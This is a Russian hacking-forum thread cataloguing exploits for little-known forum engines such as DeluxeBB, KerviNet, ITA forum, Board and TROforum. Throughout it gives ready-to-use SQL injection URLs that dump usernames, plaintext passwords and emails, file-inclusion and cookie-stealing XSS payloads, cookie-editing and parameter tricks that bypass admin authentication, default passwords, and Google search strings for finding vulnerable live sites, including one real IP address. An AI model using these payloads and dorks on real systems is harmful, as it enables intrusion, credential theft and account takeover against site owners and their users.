![]() |
[Обзор уязвимостей в форумных движках]
[Обзор уязвимостей в форумных движках] ---------------------------------------------------------------- Так же обратите внимание на темы: [Обзор уязвимостей Ipb] [Обзор уязвимостей phpBB] [Обзор уязвимостей vBulletin] [Обзор уязвимостей Ikonboard] [Обзор Уязвимостей Yabb] [Обзор уязвимостей myBB] [Обзор уязвимостей Phorum] [Обзор уязвимостей Woltlab Burning Board + Lite] [ Обзор уязвимостей miniBB ] Обзор уязвимостей PunBB Обзор уязвимостей IceBB [Обзор уязвимостей XMBForum]---------------------------------------------------------------- Эти темы так же могут быть вам полезны: Бэкдорим форумы. Теория и практика! [FAQ + полезные ссылки]- в этой теме вы сможете найти ответы на наиболее частые вопросы. ---------------------------------------------------------------- В этой теме будут выкладываться уязвимости, разных не очень популярных форумных движков. ---------------------------------------------------------------- |
Форум: DeluxeBB
Версия: <= 1.06 Уязвимость в сценарие misc.php, из за недостаточной обработки данных в параметре name можно осуществить SQL инъекцию. Код:
misc.php?sub=profile&name=0')+UNION+SELECT+1,concat(database(),char(58),version(),char(58),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*Код:
misc.php?sub=profile&name=0')+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+deluxebb_users+where+uid=1/*Эксплойт: Код:
#!/usr/bin/perlпуть к эксплойту сайт и путь до форума номер пользователя c:\expl.pl http://site.com/forum/ 1 Сайт и путь до форума писать слитно: http://site.com/forum/ - если форум в директорие forum http://site.com/bb/ - если форум в директорие bb http://site.com/ - если форум в корневом каталоге сайта Резултат работы эксплойта - хеш (md5) пароля выбранного пользователя. Пример уязвимости: Код:
http://82.212.43.253/c_forum/misc.php?sub=profile&name=0')+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*------------------------------------------------------------------ Форум: DeluxeBB Версия: <= 1.06 Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг. Уязвимых сценариев несколько: Код:
http://site.com/templates/deluxe/postreply.php?templatefolder=[file]Код:
http://site.com/templates/deluxe/postreply.php?templatefolder=123Код:
http://site.com/templates/deluxe/postreply.php?templatefolder=[file]%00 |
Форум: DeluxeBB
Версия: <= 1.07 Для этой версии есть эксплойт для получения админских привилегий. Эксплойт: Код:
#!/usr/bin/perlпуть к эксплойту сайт и путь до форума ваш логин ваш пароль c:\expl.pl http://site.com/forum/ grey 123123 Сайт и путь до форума писать слитно: http://site.com/forum/ - если форум в директорие forum http://site.com/bb/ - если форум в директорие bb http://site.com/ - если форум в корневом каталоге сайта Резултат работы эксплойта - получение админских привилегий. ------------------------------------------------------------------ Форум: DeluxeBB Версия: <= 1.9 Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг. На этот раз уязвим сценарий sig.php. PHP код:
В результате: Код:
http://site.com/templates/deluxe/cp/sig.php?settings[smilies]=on&templatefolder=[file]%00 |
Форум: WR-Форум
Версия: 1.8 Стандартный пароль который изначально стоит на форуме (на админку /admin.php) - admin. Конечно врятли что его не сменили но всё таки попробывать можно. Есть несколько активных XSS. В профиле в полях: 1. Откуда - скрипт будет срабатывать при просмотре страницы Участники. 2. Домашняя страничка - скрипт будет срабатывать при просмотре страницы Участники. 3. Подпись - скрипт будет срабатывать при просмотре сообщений в темах. Вводим <script>alert();</script> 4. При регистрации создаём пользователя с именем <script>alert();</script> - почти на каждой странице будет срабатывать ваш код. Куки пользователя выглядят примерно так: wrfcookies=Grey%7C123%7C1176741104%7C1176741104%7C %7C123%7C1176741104%7C1176741104%7C - это аски коды, если представить как символы то получиться, такая строка: |123|1176741104|1176741104| где |123| - пароль пользователя Куки админа выглядят так: frcookies=1%7Cadmin%7C1176740994%7C Опять же если представить аски коды как символы то получиться: 1|admin|1176740994| где |admin| - пароль к админ-центру Видно что пароли не только не шифруються, но и храняться в куках, имею активную xss достать куки будет не сложно. ------------------------------------------------------------ Заливка шелла: http://forum.antichat.ru/showpost.ph...8&postcount=18 ------------------------------------------------------------ Скачать форум можно здесь: http://wr-script.ru/ Для поиска сайтов с таким форумом вводим: Powered by WR-Forum Кстати сайтов с таким форумом не так уж и мало: __http://www.google.ru/search?hl=ru&q=Powered+by+WR-Forum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+G oogle&lr= |
Форум: RonForum
Версия: v30 Доступ в админку: Если открыть файл admin.php и посмотреть его содержимое, то можно встретить такую строку: PHP код:
Переходим в админку: http://site.com/from/admin.php Теперь присваиваем переменной entrance необходимое значение 1: http://site.com/from/admin.php?entrance=1 Теперь вы в админке, но есть не большой минус: при переходе по любой ссылке, значение переменной будет утеряно, что бы этого не случилось смотрим адрес ссылки, к примеру: http://site.com/from/admin.php?what=moderators и добавляем к ней необходмиое значение: http://site.com/from/admin.php?entrance=1&what=moderators ------------------------------------------------------------ Для поиска сайтов с таким форумом вводим: Copyright © Kwasnikov R.P ------------------------------------------------------------ ------------------------------------------------------------ Форум: ParkerForum Версия: 0.01 Активная XSS В поле Сайт, при создание новой темы вводим <script>alert();</script> - скрипт будет выплняться при просмотре главной страницы форума, а так же при просмотре темы. ------------------------------------------------------------ Для поиска сайтов с таким форумом вводим: Copyrights (C) by ademan ------------------------------------------------------------ ------------------------------------------------------------ Форум: Древообразный форум Версия: 1.0 Активная XSS Уязвимы поля Name и Subject. ------------------------------------------------------------ Для поиска сайтов с таким форумом вводим: Скрипт предоставлен www.chemport.ru |
tForum <= b0.915
Форум малораспространённый, но всё же. Активная XSS в поле "Message". Код:
http://www.target/path/message.phpВставляем в поле "Message": Код:
[img]javascript:alert(document.cookie)[/img]В кукисах сессия, логин. Ссылка для поиска в Google: Код:
_http://www.google.ru/search?hl=ru&newwindow=1&q=Powered+by%3A+tForum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr= |
Форум: KerviNet
Версия: 1.1 Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию. Сценарий topic.php. Уязвим параметр forum. ------------ PHP код:
Параметр передаёться, как есть, без какой либо фильтрации. ------------ Делаем запрос к базе данных: topic.php?forum=-1+union+select+1/* Таблица с пользователями: topic.php?forum=-1+union+select+1+from+users/* Вывод логина, пароля и мыла пользователя: topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users/* В результате запроса получаем: 1:TEST:123:grey@site.ru где 1 - номер пользователя, TEST - имя пользователя, 123 - пароль пользователя, заметьте пароль храниться в незашифрованном виде, grey@site.ru - мыло пользователя char(58) - это символ ':' который в нашем случае служит разделителем. Перебор пользователей: topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+0,1/* topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+1,1/* topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+2,1/* Код:
http://site.com/forum/topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+0,1/*Для поиска сайтов с таким форумом вводим: Copyright KerviNet © 2005-2007 ------------------------------------------------------------ ------------------------------------------------------------ Форум: XMB Версия: 1.5 Активная XSS Уязвим параметр MSN. При регистрации пользователя в поле MSN вводим <script>alert();</script>, скрипт будет срабатывать при просмотре профиля пользователя. ------------------------------------------------------------ Для поиска сайтов с таким форумом вводим: Powered by XMB |
Форум: ITA forum
Версия: 1.21 Версия: 1.31 Версия: 1.49 Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию. Сценарий showforum.php. Уязвим параметр fid. ------------ PHP код:
------------ Делаем запрос к БД и в результате получам имя и хеш (mysql4) пароля пользователя: Код:
http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+0,1/*Код:
http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+1,1/*Для удобства написал небольшой слойт, который выдирает хеш пользователя (id пользователя задаёться): PHP код:
php c:\exp.php site dir user_id php c:\exp.php site.ru /forum/ 1 site - сайт dir - директория с форумом user_id - номер пользователя ------------------------------------------------------------ Для поиска сайтов с таким форумом вводим: Powered By: V1.21 Для поиска сайтов с таким форумом вводим: Powered By: V1.31 Для поиска сайтов с таким форумом вводим: Powered By: V1.49 К сожалению можно встретить и пропатченную версию, в которой эта уязвимость исправленна. ------------------------------------------------------------ ------------------------------------------------------------ Другие уязвимости: 1. Форум: ITA forum Версия: 1.31 (возможно и другие версии) Версия: 1.49 (возможно и другие версии) Пассивная XSS: Код:
http://site.ru/search.php?Submit=true&search="><script>alert(123);</script>Версия: 1.49 (возможно и другие версии) SQL инъекция: Код:
http://site.ru/showuser.php?uid='+union+select+1,concat(user_name,char(58),user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+itaf_user/* |
Форум: Board
Версия: 2.0 1. SQL инъекция Сценарий view_all_topic.php. Уязвим параметр m_id. ------------ PHP код:
------------ Делаем запрос к БД в результате, логин, пароль (пароль не зашифрован) и мыло пользователя: Код:
http://site.ru/forum/view_all_topic.php?m_id=-1+union+select+concat(id,char(58),name,char(58),password,char(58),email),2,3,4,5+from+board000_users/*В поиске вводим <script>alert();</script> - скрипт выпольнится. 3. Активная XSS При создание темы/сообщения вписываем в поле заголовка сообщения или в текст сообщения <script>alert();</script> - скрипт будет выпольняться при ответе на данное сообщение/тему. 4. Возможность заходить от любого пользователя, без ввода пароля. Смотрим содержимое куков: board_user_cook=qwerty; board_user_id=3 board_user_cook - имя пользователя board_user_id - номер пользователя Теперь меняем эти значения: К примеру есть пользователь max и его номер 1: board_user_cook=max; board_user_id=1 Всё теперь вы пользователь max. ------------ В Опере значение куков менять так: Инструменты - Дополнительно - Cookies ------------------------------------------------------------ Для поиска сайтов с таким форумом вводим: Copyright ° CarLine 2002г. Не смотря на то, что форум старый сайтов с таким форумом достаточно много. ------------------------------------------------------------ ------------------------------------------------------------ Форум: ReForum Версия: 1.0 SQL инъекция Уязвим параметр viewth. Код:
http://site.ru/forum/?viewth=2 |
Форум: Trofimov forum
Версия: v1.2 Активная XSS в поле Имя. Скрипт срабатывает после добавления темы (страница forum.php). ------------------------------------------------------------ ------------------------------------------------------------ Форум: TROforum Версия: 0.3 Из-за не коректной обработки параметров, можно войти в админку имея только пароль: PHP код:
Изначально логин - login. Но перед этим условием стоит условие: PHP код:
Из условия следует, что если только логин или пароль будет неверным, то работу скрипта прекращать не следует. Имя только логин (а его угадать проще(login, admin или просто имя админа)), можно получить полный доступ к админке: Код:
http://site.ru/forum/admin/admin.php?login=login&password=loginНо здесь всё проще - файл настроек не требует авторизации: Код:
http://site.ru/forum/admin/update.php------------------------------------------------------------ Для поиска сайтов с таким форумом вводим: Powered by: TROforum 0.3 |
| Время: 22:29 |